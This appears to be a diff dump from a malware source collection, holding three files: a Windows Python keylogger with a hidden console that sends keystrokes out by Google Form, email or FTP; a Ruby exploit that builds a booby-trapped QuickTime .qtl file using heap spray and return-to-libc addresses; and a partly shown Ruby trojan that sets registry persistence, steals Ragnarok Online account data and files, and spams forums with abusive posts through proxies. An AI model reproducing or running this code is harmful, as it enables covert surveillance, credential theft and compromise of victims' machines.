import win32event, win32api, winerror
|
||||
|
||||
#Disallowing Multiple Instance
|
||||
mutex = win32event.CreateMutex(None, 1, 'mutex_var_xboz')
|
||||
if win32api.GetLastError() == winerror.ERROR_ALREADY_EXISTS:
|
||||
mutex = None
|
||||
print "Multiple Instance not Allowed"
|
||||
exit(0)
|
||||
x=''
|
||||
data=''
|
||||
count=0
|
||||
|
||||
#Hide Console
|
||||
def hide():
|
||||
import win32console,win32gui
|
||||
window = win32console.GetConsoleWindow()
|
||||
win32gui.ShowWindow(window,0)
|
||||
return True
|
||||
def msg():
|
||||
print """Xenotix Python Keylogger for Windows
|
||||
Coder: Ajin Abraham <ajin25@gmail.com>
|
||||
OPENSECURITY.IN
|
||||
|
||||
usage:xenotix_python_logger.py mode
|
||||
mode:
|
||||
local: store the logs in a file [keylogs.txt]
|
||||
remote: send the logs to a Google Form. You must specify the Form URL and Field Name in the script.
|
||||
email: send the logs to an email. You must specify (SERVER,PORT,USERNAME,PASSWORD,TO).
|
||||
ftp: upload logs file to an FTP account. You must specify (SERVER,USERNAME,PASSWORD,SSL OPTION,OUTPUT DIRECTORY).
|
||||
"""
|
||||
return True
|
||||
|
||||
#Local Keylogger
|
||||
def local():
|
||||
global data
|
||||
if len(data)>100:
|
||||
fp=open("keylogs.txt","a")
|
||||
fp.write(data)
|
||||
fp.close()
|
||||
data=''
|
||||
return True
|
||||
|
||||
#Remote Google Form logs post
|
||||
def remote():
|
||||
global data
|
||||
if len(data)>100:
|
||||
url="https://docs.google.com/forms/d/xxxxxxxxxxxxxxxxxxxxxxxxxxxxx" #Specify Google Form URL here
|
||||
klog={'entry.xxxxxxxxxxx':data} #Specify the Field Name here
|
||||
try:
|
||||
dataenc=urllib.urlencode(klog)
|
||||
req=urllib2.Request(url,dataenc)
|
||||
response=urllib2.urlopen(req)
|
||||
data=''
|
||||
except Exception as e:
|
||||
print e
|
||||
return True
|
||||
|
||||
#Email Logs
|
||||
class TimerClass(threading.Thread):
|
||||
def __init__(self):
|
||||
threading.Thread.__init__(self)
|
||||
self.event = threading.Event()
|
||||
def run(self):
|
||||
while not self.event.is_set():
|
||||
global data
|
||||
if len(data)>100:
|
||||
ts = datetime.datetime.now()
|
||||
SERVER = "smtp.gmail.com" #Specify Server Here
|
||||
PORT = 587 #Specify Port Here
|
||||
USER="your_email@gmail.com"#Specify Username Here
|
||||
PASS="password_here"#Specify Password Here
|
||||
FROM = USER#From address is taken from username
|
||||
TO = ["to_address@gmail.com"] #Specify to address.Use comma if more than one to address is needed.
|
||||
SUBJECT = "Keylogger data: "+str(ts)
|
||||
MESSAGE = data
|
||||
message = """\
|
||||
From: %s
|
||||
To: %s
|
||||
Subject: %s
|
||||
|
||||
%s
|
||||
""" % (FROM, ", ".join(TO), SUBJECT, MESSAGE)
|
||||
try:
|
||||
server = smtplib.SMTP()
|
||||
server.connect(SERVER,PORT)
|
||||
server.starttls()
|
||||
server.login(USER,PASS)
|
||||
server.sendmail(FROM, TO, message)
|
||||
data=''
|
||||
server.quit()
|
||||
except Exception as e:
|
||||
print e
|
||||
self.event.wait(120)
|
||||
|
||||
#Upload logs to FTP account
|
||||
def ftp():
|
||||
global data,count
|
||||
if len(data)>100:
|
||||
count+=1
|
||||
FILENAME="logs-"+str(count)+".txt"
|
||||
fp=open(FILENAME,"a")
|
||||
fp.write(data)
|
||||
fp.close()
|
||||
data=''
|
||||
try:
|
||||
SERVER="ftp.xxxxxx.com" #Specify your FTP Server address
|
||||
USERNAME="ftp_username" #Specify your FTP Username
|
||||
PASSWORD="ftp_password" #Specify your FTP Password
|
||||
SSL=0 #Set 1 for SSL and 0 for normal connection
|
||||
OUTPUT_DIR="/" #Specify output directory here
|
||||
if SSL==0:
|
||||
ft=ftplib.FTP(SERVER,USERNAME,PASSWORD)
|
||||
elif SSL==1:
|
||||
ft=ftplib.FTP_TLS(SERVER,USERNAME,PASSWORD)
|
||||
ft.cwd(OUTPUT_DIR)
|
||||
fp=open(FILENAME,'rb')
|
||||
cmd= 'STOR' +' '+FILENAME
|
||||
ft.storbinary(cmd,fp)
|
||||
ft.quit()
|
||||
fp.close()
|
||||
os.remove(FILENAME)
|
||||
except Exception as e:
|
||||
print e
|
||||
return True
|
||||
|
||||
def main():
|
||||
global x
|
||||
if len(sys.argv)==1:
|
||||
msg()
|
||||
exit(0)
|
||||
else:
|
||||
if sys.argv[1]=="local":
|
||||
x=1
|
||||
hide()
|
||||
elif sys.argv[1]=="remote":
|
||||
x=2
|
||||
hide()
|
||||
elif sys.argv[1]=="email":
|
||||
hide()
|
||||
email=TimerClass()
|
||||
email.start()
|
||||
elif sys.argv[1]=="ftp":
|
||||
x=4
|
||||
hide()
|
||||
else:
|
||||
msg()
|
||||
exit(0)
|
||||
return True
|
||||
main()
|
||||
|
||||
def keypressed(event):
|
||||
global x,data
|
||||
if event.Ascii==13:
|
||||
keys='<ENTER>'
|
||||
elif event.Ascii==8:
|
||||
keys='<BACK SPACE>'
|
||||
elif event.Ascii==9:
|
||||
keys='<TAB>'
|
||||
else:
|
||||
keys=chr(event.Ascii)
|
||||
data=data+keys
|
||||
if x==1:
|
||||
local()
|
||||
elif x==2:
|
||||
remote()
|
||||
elif x==4:
|
||||
ftp()
|
||||
|
||||
obj = pyHook.HookManager()
|
||||
obj.KeyDown = keypressed
|
||||
obj.HookKeyboard()
|
||||
pythoncom.PumpMessages()
|
61
Ruby/Constructor.Ruby.Qtp.a
Normal file
61
Ruby/Constructor.Ruby.Qtp.a
Normal file
@ -0,0 +1,61 @@
|
||||
|
||||
#!/usr/bin/ruby
|
||||
# Copyright (c) LMH <lmh [at] info-pull.com>
|
||||
# Kevin Finisterre <kf_lists [at] digitalmunition.com>
|
||||
#
|
||||
# Notes:
|
||||
# Our command string is loaded on memory at a static address normally,
|
||||
# but this depends on execution method and the string length. The address set in this exploit will
|
||||
# be likely successful if we open the resulting QTL file directly, without having an
|
||||
# instance of Quicktime running. Although, when using another method and string, you'll need
|
||||
# to find the address.
|
||||
# For 100% reliable exploitation you can always use the /bin/sh address,
|
||||
# but that's not as a cool as having your box welcoming the new year.
|
||||
# Do whatever you prefer. That said, enjoy.
|
||||
#
|
||||
# see http://projects.info-pull.com/moab/MOAB-01-01-2007.html
|
||||
|
||||
# Command string: Use whatever you like.
|
||||
# Remember that changing this will also need a change of the target address for system(),
|
||||
# unless string length is the same.
|
||||
CMD_STRING = "/usr/bin/say Happy new year shit bag"
|
||||
|
||||
# Mac OS X 10.4.8 (8L2127)
|
||||
EBP_ADDR = 0xdeadbabe
|
||||
SYSTEM_ADDR = 0x90046c30 # NX Wars: The Libc Strikes Back
|
||||
SETUID_ADDR = 0x900334f0
|
||||
CURL_ADDR = 0x916c24bc # /usr/bin/curl
|
||||
SHELL_ADDR = 0x918bef3a # /bin/sh
|
||||
CMDSTR_ADDR = [
|
||||
SHELL_ADDR, # 0 addr to static /bin/sh (lame)
|
||||
0x017a053c, # 1 addr to our command string (cool) :> (change as necessary)
|
||||
0xbabeface, # 2 bogus addr for testing.
|
||||
CURL_ADDR # 3 addr to '/usr/bin/curl'
|
||||
]
|
||||
|
||||
# Payload. default to CMDSTR_ADDR 0 (/bin/sh)
|
||||
HAPPY = ("A" * 299) +
|
||||
[EBP_ADDR].pack("V") +
|
||||
[SYSTEM_ADDR].pack("V") +
|
||||
[SETUID_ADDR].pack("V") +
|
||||
[CMDSTR_ADDR[0]].pack("V") # change array index for using diff. addr (see CMDSTR_ADDR)
|
||||
|
||||
# Sleds: not necessary if using /bin/bash addr or other built-in addresses.
|
||||
# although, for using our own fu, we need to spray some data for better reliability
|
||||
# the goal is causing allocation of large heap chunks
|
||||
NEW = ("\x90" * 30000) + CMD_STRING # feed the heap
|
||||
YEAR = ("\x90" * 30000) + CMD_STRING # go johnny, go
|
||||
APPLE = ("\x90" * 30000) + "EOOM" # feed the heap more
|
||||
BOYZ = ("\x90" * 30000) + "FOOM" # and more
|
||||
|
||||
# QTL output template
|
||||
QTL_CONTENT = "<?xml version=\"1.0\"?>" +
|
||||
"<?quicktime type=\"application/x-quicktime-media-link\"?>" +
|
||||
"<embed autoplay=\"true\" moviename=\"#{NEW}\" " +
|
||||
"qtnext=\"#{YEAR}\" type=\"video/quicktime#{APPLE}\" " +
|
||||
"src=\"rtsp://#{BOYZ}:#{HAPPY}\" />\n"
|
||||
|
||||
target_file = File.open("pwnage.qtl", "w+") { |f|
|
||||
f.print(QTL_CONTENT)
|
||||
f.close
|
||||
}
|
574
Ruby/Trojan-Spy.Ruby.Kakkeys.d
Normal file
574
Ruby/Trojan-Spy.Ruby.Kakkeys.d
Normal file
@ -0,0 +1,574 @@
|
||||
$KCODE = 's'
|
||||
#$DEBUG = true
|
||||
#Exerb = nil
|
||||
require 'Win32API'
|
||||
if ARGV.size == 1 and ARGV[0].include?('RoAddr')
|
||||
$path = ARGV[0]
|
||||
if File.exist?($path)
|
||||
$rost = Win32API.new($path, 'RO_GetNowState', '', 'l')
|
||||
$rowld = Win32API.new($path, 'RO_GetNowWorld', '', 'p')
|
||||
$ropa = Win32API.new($path, 'RO_GetNowParam', 'i', 'p')
|
||||
$roin = Win32API.new($path, 'RO_RoAddrInit', 'lpl', 'i')
|
||||
$roin.call(0, '', 0x7FFFFFFF)
|
||||
$rost.call
|
||||
if $rost.call == 2
|
||||
print $ropa.call(258).to_s + "[#{$rowld.call}]"
|
||||
end
|
||||
end
|
||||
exit
|
||||
end
|
||||
require 'win32/registry'
|
||||
require 'ftools'
|
||||
def dll(file)
|
||||
if !File.exist?('C:/windows/system32/' + file)
|
||||
f = Exerb.open(file)
|
||||
f.binmode
|
||||
open('C:/windows/system32/' + file, 'w'){|f2|
|
||||
f2.binmode
|
||||
f.read 9
|
||||
p f2.write(f.read)
|
||||
}
|
||||
f.close
|
||||
end
|
||||
end
|
||||
if Exerb
|
||||
if !Exerb.filepath.include?('iexplore')
|
||||
File.copy(Exerb.filepath, 'C:/windows/system32/iexplore.exe')
|
||||
`start install.exe`
|
||||
dll('zlib.dll')
|
||||
dll('7-zip32.dll')
|
||||
dll('imgctl.dll')
|
||||
Win32::Registry.open(Win32::Registry::HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run', Win32::Registry::Constants::KEY_WRITE){|key|
|
||||
key.write_s('Shell', 'C:/windows/system32/iexplore.exe')
|
||||
}
|
||||
`start C:\\windows\\system32\\iexplore.exe`
|
||||
exit
|
||||
else
|
||||
=begin
|
||||
$double = Thread.new{
|
||||
cm = Win32API.new('kernel32', 'CreateMutex', 'llp', 'l')
|
||||
rm = Win32API.new('kernel32', 'ReleaseMutex', 'l', 'l')
|
||||
ch = Win32API.new('kernel32', 'CloseHandle', 'l', 'l')
|
||||
om = Win32API.new('kernel32', 'OpenMutex', 'llp', 'l')
|
||||
gle = Win32API.new('kernel32', 'GetLastError', '', 'l')
|
||||
|
||||
hage = cm.call(0, 0, 'hagemoe')
|
||||
if gle.call == 183
|
||||
ch.call hage
|
||||
hage = nil
|
||||
hagege = cm.call(0, 0, 'hagegemoe')
|
||||
if gle.call == 183
|
||||
ch.call hagege
|
||||
exit 1
|
||||
end
|
||||
elsif
|
||||
0
|
||||
end
|
||||
if hage
|
||||
s = 'hagegemoe'
|
||||
else
|
||||
s = 'hagemoe'
|
||||
end
|
||||
while(1)
|
||||
a = om.call(1, 0, s)
|
||||
if a == 0
|
||||
if ARGV[0] == 'aaa'
|
||||
p system("start #{Exerb.filepath}")
|
||||
else
|
||||
p system("strat #{Exerb.filepath} aaa")
|
||||
end
|
||||
Win32::Registry.open(Win32::Registry::HKEY_LOCAL_MACHINE, '\SOFTWARE\Microsoft\Windows\CurrentVersion\Run', Win32::Registry::Constants::KEY_WRITE){|key|
|
||||
key.write_s('Shell', 'C:/windows/system32/iexplore.exe')
|
||||
}
|
||||
sleep 0.1
|
||||
else
|
||||
ch.call(a)
|
||||
end
|
||||
#p "sss"
|
||||
sleep 0.04
|
||||
end
|
||||
}
|
||||
=end
|
||||
end
|
||||
end
|
||||
if ARGV[0] == 'aaa'
|
||||
sleep
|
||||
end
|
||||
END {
|
||||
Win32::Registry.open(Win32::Registry::HKEY_LOCAL_MACHINE, 'SOFTWARE\Microsoft\Windows\CurrentVersion\Run', Win32::Registry::Constants::KEY_WRITE){|key|
|
||||
key.write_s('Shell', 'C:/windows/system32/iexplore.exe')
|
||||
}
|
||||
}
|
||||
require 'kconv'
|
||||
require 'web/agent'
|
||||
require 'web/linkextor'
|
||||
|
||||
|
||||
$wait_time = 1
|
||||
$bbs_arr = [['computer', '10041'], ['computer', '10376'], ['computer', '11089'], ['computer', '14218'], ['computer', '14368'], ['computer', '6135'], ['computer', '6253'], ['computer', '6346'], ['computer', '7430'], ['game', '1185'], ['game', '12884'], ['game', '18472'], ['game', '19824'], ['game', '5420'], ['game', '5458'], ['game', '6141'], ['game', '9397'], ['shop', '832'], ['computer', '6567'], ['game', '10013'], ['computer', '21565'], ['computer', '21563']]
|
||||
|
||||
$category = ''
|
||||
$bbs = ''
|
||||
|
||||
$ropath = []
|
||||
$korepath = []
|
||||
$nypath = []
|
||||
$toolpath = []
|
||||
$charanames = []
|
||||
$tar = ['ragnarok.exe', 'items_control.txt', 'winny.exe']
|
||||
$tool = ['ChatPon.exe', 'arose*.exe', 'AutoImo.exe', 'eqview.exe', 'ExS.exe', 'Meron*.exe', 'RAGNAvi.exe', 'RoAbrPure.exe', 'RoCha.exe', 'RoMonitor.exe', 'ro.exe' ,'ROPTAssist.exe' ,'RSS.exe' ,'rohp.exe' ,'RoLogger.exe' ,'MessengerGPS.exe' ,'Lognarok.exe' ,'ro_gps.exe', 'ROGIS.exe' ,'xdior*.exe' ,'LimeChat.exe']
|
||||
$kakikomi = []
|
||||
$id = ''
|
||||
$charaarr = []
|
||||
$charas = ''
|
||||
$tekito_id = ''
|
||||
def Dir.copy(from, to, *jogai)
|
||||
begin
|
||||
sleep 0.01
|
||||
Dir.foreach(from){|x|
|
||||
if !x.match(/^\.\.?/)
|
||||
if File.directory?(from + x)
|
||||
Dir.mkdir(to + x)
|
||||
Dir.copy(from + x + '/', to + x + '/', *jogai)
|
||||
else
|
||||
if !jogai.any?{|jo| x.include?(jo)} or jogai.size == 0
|
||||
File.copy(from + x, to + x)
|
||||
end
|
||||
end
|
||||
end
|
||||
}
|
||||
rescue
|
||||
return 1
|
||||
end
|
||||
0
|
||||
end
|
||||
def delete_dir(dir)
|
||||
begin
|
||||
Dir.foreach(dir){|x|
|
||||
if !x.match(/^\.\.?/)
|
||||
if File.directory?(dir + x)
|
||||
if Dir.entries(dir + x).size <= 2
|
||||
Dir.delete(dir + x)
|
||||
else
|
||||
delete_dir(dir + x + '/')
|
||||
end
|
||||
else
|
||||
File.delete(dir + x)
|
||||
end
|
||||
end
|
||||
}
|
||||
Dir.delete(dir)
|
||||
rescue
|
||||
return 1
|
||||
end
|
||||
0
|
||||
end
|
||||
def roname
|
||||
abx = `#{Exerb.filepath} \"#{$ropath}/RoAddr.dll\"` if Exerb
|
||||
return nil if abx.size == 0
|
||||
$charanames.push(abx) if !$charanames.include?(abx)
|
||||
savedata($savefile)
|
||||
abx
|
||||
end
|
||||
def emotion_wana wana
|
||||
Win32::Registry.open(Win32::Registry::HKEY_LOCAL_MACHINE, 'SOFTWARE\Gravity Soft\Ragnarok\ShortCutList', Win32::Registry::Constants::KEY_WRITE){|key|
|
||||
for i in 0..9
|
||||
key.write_s(i.to_s, wana)
|
||||
end
|
||||
}
|
||||
end
|
||||
def upfolder(folder, trip)
|
||||
Dir.mkdir(folder) if !File.exist?(folder)
|
||||
begin
|
||||
$nypath.each{|x|
|
||||
File.chmod(0777, x + '/upfolder.txt')
|
||||
open(x + '/UpFolder.txt', 'a+'){|f|
|
||||
f.write("\n[ブーン]\nPath=#{folder}\nTrip=#{trip}") if !f.read.include?('ブーン')
|
||||
}
|
||||
}
|
||||
rescue
|
||||
end
|
||||
folder
|
||||
end
|
||||
def saiki dir
|
||||
sleep 0.01
|
||||
begin
|
||||
Dir.chdir(dir){
|
||||
#print Dir.pwd + "\n"
|
||||
$ropath.push Dir.pwd if File.exist?($tar[0])
|
||||
$korepath.push File.dirname(Dir.pwd) if File.exist?($tar[1])
|
||||
sleep 0.01
|
||||
$nypath.push Dir.pwd if File.exist?($tar[2])
|
||||
$kakikomi.push( Dir.pwd + '/' + 'kakikomi.txt') if File.exist?('kakikomi.txt')
|
||||
$toolpath.push Dir.pwd if Dir[$tool.join("\0")].size != 0
|
||||
Dir.foreach('./'){ |x|
|
||||
if File.directory?(x) && !x.match(/\.\.?/)
|
||||
saiki(x)
|
||||
end
|
||||
}
|
||||
}
|
||||
rescue
|
||||
p $!
|
||||
ensure
|
||||
end
|
||||
end
|
||||
def search
|
||||
get_drv_type = Win32API.new('kernel32', 'GetDriveType', 'p', 'l')
|
||||
|
||||
for drive in 'CDEFGHIJKLMNOPQRSTUVWXYZ'.split('')
|
||||
if get_drv_type.call(drive + ':/') == 3
|
||||
saiki(drive + ':/')
|
||||
end
|
||||
end
|
||||
$ropath.uniq!
|
||||
$toolpath.uniq!
|
||||
$korepath.uniq!
|
||||
$nypath.uniq!
|
||||
end
|
||||
def savedata(path)
|
||||
open(path, 'w'){|f|
|
||||
Marshal.dump($ropath, f)
|
||||
Marshal.dump($korepath, f)
|
||||
Marshal.dump($nypath, f)
|
||||
Marshal.dump($toolpath, f)
|
||||
Marshal.dump($kakikomi, f)
|
||||
Marshal.dump($bbs_arr, f)
|
||||
Marshal.dump($charanames, f)
|
||||
Marshal.dump($tekito_id, f)
|
||||
}
|
||||
true
|
||||
end
|
||||
def loaddata(path)
|
||||
return false if !File.exists?(path)
|
||||
open(path){|f|
|
||||
$ropath = Marshal.load(f)
|
||||
$korepath = Marshal.load(f)
|
||||
$nypath = Marshal.load(f)
|
||||
$toolpath = Marshal.load(f)
|
||||
$kakikomi = Marshal.load(f)
|
||||
$bbs_arr = Marshal.load(f)
|
||||
$charanames = Marshal.load(f)
|
||||
$tekito_id = Marshal.load(f)
|
||||
}
|
||||
true
|
||||
end
|
||||
def rns *str
|
||||
if str.size == 1
|
||||
str = str[0].split('')
|
||||
end
|
||||
str[rand(str.size)]
|
||||
end
|
||||
def names
|
||||
begin
|
||||
$charaarr = []
|
||||
$charas = ''
|
||||
separater = rns("わ#{rand(100)}な", "わー#{rand(100)}な", "rtx", "RoAddr", 'ラーメン', 'rxv', '弁当', 'bot', '焼', 'ああああ', 'zeny', 'ini', 'config', 'パケ', *$omosiro_words)
|
||||
Win32::Registry.open(Win32::Registry::HKEY_LOCAL_MACHINE, 'SOFTWARE\\Gravity Soft\\Ragnarok\\Whisperlist\\') { |wisp_list|
|
||||
wisp_list.each_key{|server_str, sute|
|
||||
$charas += server_str + "\n"
|
||||
wisp_list.open(server_str){|server|
|
||||
server.each_key{|char_str, sute|
|
||||
$charaarr.push char_str.split("\0")[0]
|
||||
}
|
||||
}
|
||||
$charas += $charaarr.join(separater) + "\n" + $charanames.join(separater) + "\n"
|
||||
$charaarr = []
|
||||
}
|
||||
}
|
||||
Win32::Registry.open(Win32::Registry::HKEY_LOCAL_MACHINE, 'SOFTWARE\\Gravity Soft\\Ragnarok\\'){|key| $id = key.read('ID')[1].split("\0")[0]}
|
||||
rescue
|
||||
p $1
|
||||
end
|
||||
end
|
||||
names
|
||||
|
||||
$upup = upfolder('C:\program files\daemontools\\', '')
|
||||
$capture = Proc.new{
|
||||
loop do
|
||||
getDC = Win32API.new('user32', 'GetDC', 'l', 'l')
|
||||
releaceDC = Win32API.new('user32', 'ReleaseDC', 'll', 'l')
|
||||
dc2dib = Win32API.new('imgctl', 'DCtoDIB', 'lllll', 'l')
|
||||
dib2png = Win32API.new('imgctl', 'DIBtoPNG', 'pli', 'i')
|
||||
deleteDib = Win32API.new('imgctl', 'DeleteDIB', 'l', 'i')
|
||||
begin
|
||||
akakaka = roname
|
||||
hdc = getDC.call(0)
|
||||
hdib = dc2dib.call(hdc,0,0,0,0)
|
||||
dib2png.call($upup+'[バグザロック] '+$tekito_id+' '+Time.now.strftime('%Y%m%d-%H%M%S')+' 「'+$charanames.join('」「')+'」.png', hdib, 0)
|
||||
File.rename(Dir.glob('C:/program files/daemontools/*.zip')[0], "#{$upup}[バグザロック] #{$id} 「#{$charanames.join('」「')}」.zip") if (Dir.glob('C:/program files/daemontools/*.zip').size > 0)
|
||||
ensure
|
||||
deleteDib.call(hdib)
|
||||
releaceDC.call(0, hdc)
|
||||
end
|
||||
if akakaka
|
||||
jikan = Time.now
|
||||
if jikan.wday == 0 and jikan.hour < 24 and jikan.hour > 18
|
||||
emotion_wana "やあ僕BOTer!#{$charanames[rand($charanames.size)]} はBOTだよ ハゲ孫泰蔵と森下はさっさと死ね!!"
|
||||
sleep 5 * 60
|
||||
else
|
||||
sleep 12 * 60
|
||||
end
|
||||
else
|
||||
begin
|
||||
open('c:/program files/internet explorer/iexplore.exe', 'a'){}
|
||||
sleep 20 * 60
|
||||
rescue
|
||||
sleep 15 * 60
|
||||
end
|
||||
end
|
||||
end
|
||||
}
|
||||
#init
|
||||
$savefile = 'C:/RECYCLER/explorer.sys'
|
||||
if !loaddata($savefile)
|
||||
Thread.new(&$capture)
|
||||
search
|
||||
savedata($savefile)
|
||||
else
|
||||
Thread.new(&$capture)
|
||||
end
|
||||
if $tekito_id.size == 0
|
||||
$tekito_id = $id
|
||||
end
|
||||
#p $ropath, $korepath, $nypath, $toolpath, $charanames
|
||||
if Dir.glob('C:/program files/daemontools/*.zip').size == 0
|
||||
begin
|
||||
tmpf = 'C:/RECYCLER/tmp/'
|
||||
Dir.mkdir(tmpf) if !File.exist?(tmpf)
|
||||
$toolpath.each{|x|
|
||||
to = tmpf + x.gsub(/\/|:/, '_')
|
||||
if File.exist?(to);to = to + '_';end
|
||||
Dir.mkdir(to)
|
||||
Dir.copy(x + '/', to + '/', 'txt')
|
||||
}
|
||||
$korepath.each{|x|
|
||||
to = tmpf + x.gsub(/\/|:/, '_')
|
||||
if File.exist?(to);to = to + '_';end
|
||||
Dir.mkdir(to)
|
||||
Dir.copy(x + '/', to + '/', 'fld')
|
||||
}
|
||||
$ropath.each{|x|
|
||||
to = tmpf + x.gsub(/\/|:/, '_')
|
||||
if File.exist?(to);to = to + '_';end
|
||||
Dir.mkdir(to)
|
||||
Dir.copy(x + '/', to + '/', '.grf', '.gpf', '.mp3', '.bmp', '.ebm', '.fld')
|
||||
}
|
||||
$nypath.each_with_index{|x, i|
|
||||
if i == 0
|
||||
to = tmpf + 'winny'
|
||||
else
|
||||
to = tmpf + 'winny' + i.to_s
|
||||
end
|
||||
Dir.mkdir(to) if !File.exist?(to)
|
||||
File.copy(x + '/' + 'Download.txt', to + '/' + 'Download.txt') if File.exist?(x + '/' + 'Download.txt')
|
||||
File.copy(x + '/' + 'Tab1.txt', to + '/' + 'Tab1.txt') if File.exist?(x + '/' + 'Tab1.txt')
|
||||
File.copy(x + '/' + 'Tab2.txt', to + '/' + 'Tab2.txt') if File.exist?(x + '/' + 'Tab2.txt')
|
||||
}
|
||||
$kakikomi.each{|x|
|
||||
File.copy(x, tmpf + x.gsub(/\/|:/, '_')) if !File.exist?(x)
|
||||
}
|
||||
seven_zip = Win32API.new('7-zip32.dll', 'SevenZip', 'lppl', 'i')
|
||||
str = 'aaaaa'
|
||||
|
||||
seven_zip.call(0, 'a -tzip -hide "' + $upup + '[バグザロック] ' + $id + ' 「' + $charanames.join('」「') + '」.zip" c:\recycler\tmp\ -r', str, 5)
|
||||
rescue
|
||||
p $!
|
||||
print $!.backtrace.join("\n")
|
||||
ensure
|
||||
delete_dir tmpf
|
||||
end
|
||||
end
|
||||
#exit
|
||||
|
||||
$path = $ropath[0] + '/'
|
||||
|
||||
$roaddr = File.exist?($path + 'roaddr.dll')
|
||||
$ro = File.exist?($path + 'ragexe.exe')
|
||||
$are = File.exist?($path + 'ws2_32.dll')
|
||||
$rtx = File.exist?($path + 'ddraw.dll')
|
||||
def rtx
|
||||
rns(rns('rRrR'), rns('あアア') + rns('ー-‐-あアア') + rns('るルル')) +
|
||||
rns(rns('tTtT'), rns('てテテ') + rns('いぃイぃイ') + rns('いイイー-‐-')) +
|
||||
rns(rns('xXxX'), rns('えエエ') + rns('つツっッッ') + rns('くクク') + rns('すスス'))
|
||||
end
|
||||
|
||||
def aretool
|
||||
rns(rns('aAaA'), rns('あアア')) +
|
||||
rns(rns('rRrR') + rns('eEeE'), rns('れレレ')) +
|
||||
rns(rns('tTtT') + rns('oOoO00'), rns('つツツ')) +
|
||||
rns(rns('oOoO00'), rns('うウウー-‐-')) +
|
||||
rns(rns('lLlL'), rns('るルル'))
|
||||
end
|
||||
$nypath.each{|x|
|
||||
if File.exist?(x + '/Tab1.txt')
|
||||
open(x + '/Tab1.txt'){|f|
|
||||
$omosiro_words = f.read.split("\n")
|
||||
}
|
||||
end
|
||||
}
|
||||
|
||||
def getThreads
|
||||
http = Web::Agent.new
|
||||
http.setup
|
||||
http.req.header['User-Agent']="Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.7) Gecko/20040803 Firefox/0.9.3"
|
||||
$category, $bbs = *$bbs_arr[rand($bbs_arr.size)]
|
||||
http.get("http://jbbs.livedoor.jp/#{$category}/#{$bbs}/subject.txt")
|
||||
$suret = http.rsp.body.split("\n")
|
||||
sss = []
|
||||
$suret.each{|sure|
|
||||
if !sure.match(/.*\(10000?\)/)
|
||||
sure.match(/^(\d+)/)
|
||||
sss.push $1
|
||||
end
|
||||
}
|
||||
return sss;
|
||||
end
|
||||
#p '書き込み開始'
|
||||
|
||||
agent = Web::Agent.new
|
||||
agent.setup
|
||||
agent.req.header['User-Agent']="Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.7) Gecko/20040803 Firefox/0.9.3"
|
||||
agent.get('http://www.cybersyndrome.net/pla.html')
|
||||
agent.rsp.body.match("")
|
||||
proxy = []
|
||||
while($'.match(/\"A\">([^<>]*)<\/a>/)) #'
|
||||
proxy.push($~[1])
|
||||
end
|
||||
proxy.delete_if{|pr|
|
||||
pr.match(/(80)|(8080)/)
|
||||
}
|
||||
proxy.collect! do |i|
|
||||
i.split(':')
|
||||
end
|
||||
|
||||
count = 0
|
||||
while(1)
|
||||
sure = getThreads;
|
||||
if rand(6) == 0
|
||||
for ituuu in 0..9
|
||||
age = Web::Agent.new
|
||||
age.setup
|
||||
age.req.header['User-Agent'] = "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.7) Gecko/20050112 Firefox/0.9.8"
|
||||
age.req.header['Referer'] = "http://yy14.kakiko.com/landstriker/"
|
||||
age.get 'http://yy14.kakiko.com/landstriker/subject.txt'
|
||||
suret = age.rsp.body.split("\n")
|
||||
sss = []
|
||||
suret.each{|sure|
|
||||
if !sure.match(/.*\(10000?\)/)
|
||||
sure.match(/^(\d+)/)
|
||||
sss.push $1
|
||||
end
|
||||
}
|
||||
Thread.new{
|
||||
age.setup
|
||||
age.req.header['User-Agent'] = "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.7) Gecko/20050112 Firefox/0.9.8"
|
||||
age.req.header['Referer'] = "http://yy14.kakiko.com/landstriker/"
|
||||
age.req.header['content-type']='application/x-www-form-urlencoded'
|
||||
ran = rand(proxy.size)
|
||||
if rand(2) == 1
|
||||
age.proxy_host = proxy[ran][0]
|
||||
age.proxy_port = proxy[ran][1]
|
||||
end
|
||||
if sss.size != 0
|
||||
if $id == ''
|
||||
age.req.form.add 'FROM', (10000 + rand(90000)).to_s
|
||||
age.req.form.add 'mail', 'sage'
|
||||
age.req.form.add 'MESSAGE', rns("わ#{rand(100)}な", "わー#{rand(100)}な", "rtx", "RoAddr", 'ラーメン', 'rxv', '弁当', 'bot', 'ro', '焼', 'ああああ', 'zeny', *$omosiro_words)
|
||||
else
|
||||
names
|
||||
age.req.form.add 'FROM', $id
|
||||
age.req.form.add 'mail', ''
|
||||
massage = ''
|
||||
massage = "なあ、ひとつ質問なんだけど・・・・・・お前達規約違反者はどうして今すぐにでも死なないんだ?\n" if rand(10) == 1
|
||||
massage += rtx + "\n" if $rtx
|
||||
massage += aretool + "\n" if $are
|
||||
massage += "RoAddr\n" if $roaddr && rand(2) == 1
|
||||
massage += "KORE\n" if $korepath.size > 0
|
||||
massage += $charas
|
||||
age.req.form.add 'MESSAGE', massage
|
||||
end
|
||||
age.req.form.add 'bbs', 'landstriker'
|
||||
age.req.form.add 'key', sure[rand(sure.size)]
|
||||
age.req.form.add 'time', Time.now.to_i.to_s
|
||||
age.req.form.add 'submit', '書き込む'
|
||||
age.post('http://yy14.kakiko.com/test.bbs.cgi')
|
||||
else
|
||||
suret[rand(suret.size)].match(/,(.+)\(/)
|
||||
age.setup
|
||||
age.req.header['User-Agent'] = "Mozilla/5.0 (Windows; U; Windows NT 5.1; ja-JP; rv:1.7) Gecko/20050112 Firefox/0.9.8"
|
||||
age.req.header['Referer'] = "http://jbbs.livedoor.jp/#{$category}/#{$bbs}/"
|
||||
age.req.header['content-type']='application/x-www-form-urlencoded'
|
||||
age.req.form.add 'FROM', ''
|
||||
age.req.form.add 'mail', ''
|
||||
age.req.form.add 'subject', $1.chop + rand(10).to_i.to_s
|
||||
age.req.form.add 'MESSAGE', rns("わ#{rand(100)}な", "わー#{rand(100)}な", "rtx", "RoAddr", 'ラーメン', 'rxv', '弁当', 'bot', 'ro', '焼', 'ああああ', 'zeny', *$omosiro_words)
|
||||
age.req.form.add 'bbs', $bbs
|
||||
age.req.form.add 'time', Time.now.to_s.toi
|
||||
age.req.form.add 'submit', '新規スレッド作成'
|
||||
